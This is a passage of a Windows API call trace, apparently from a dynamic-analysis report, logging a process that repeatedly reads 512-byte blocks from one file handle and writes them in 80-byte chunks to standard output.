lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.232] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.232] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 
[0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] GetFileType (hFile=0x4c) returned 0x1 [0225.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.233] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.234] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, 
lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] GetFileType (hFile=0x4c) returned 0x1 [0225.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.234] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.235] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType 
(hFile=0x4c) returned 0x1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.235] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] GetFileType (hFile=0x4c) returned 0x1 [0225.236] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0225.236] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.236] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, 
lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.237] GetFileType (hFile=0x4c) returned 0x1 [0225.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.238] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] GetFileType (hFile=0x4c) returned 0x1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.238] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.238] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: 
hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.239] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] GetFileType (hFile=0x4c) returned 0x1 [0225.239] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.239] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.240] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.241] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e530, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesRead=0x22e530*=0x200, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f340*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f340*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f390*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f390*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] GetFileType (hFile=0x4c) returned 0x1 [0225.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.241] WriteFile (in: hFile=0x4c, lpBuffer=0x22f3e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, 
lpOverlapped=0x0 | out: lpBuffer=0x22f3e0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.242] GetFileType (hFile=0x4c) returned 0x1 [0225.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.242] WriteFile (in: hFile=0x4c, lpBuffer=0x22f430*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f430*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.405] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.405] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f480*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f480*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f4d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f4d0*, lpNumberOfBytesWritten=0x22e524*=0x50, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] GetFileType (hFile=0x4c) returned 0x1 [0225.406] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.406] WriteFile (in: hFile=0x4c, lpBuffer=0x22f520*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e524, lpOverlapped=0x0 | out: lpBuffer=0x22f520*, lpNumberOfBytesWritten=0x22e524*=0x20, lpOverlapped=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.406] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e510 | out: lpNewFilePointer=0x0) returned 1 [0225.406] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.406] ReadFile (in: hFile=0x54, lpBuffer=0x22f340, 
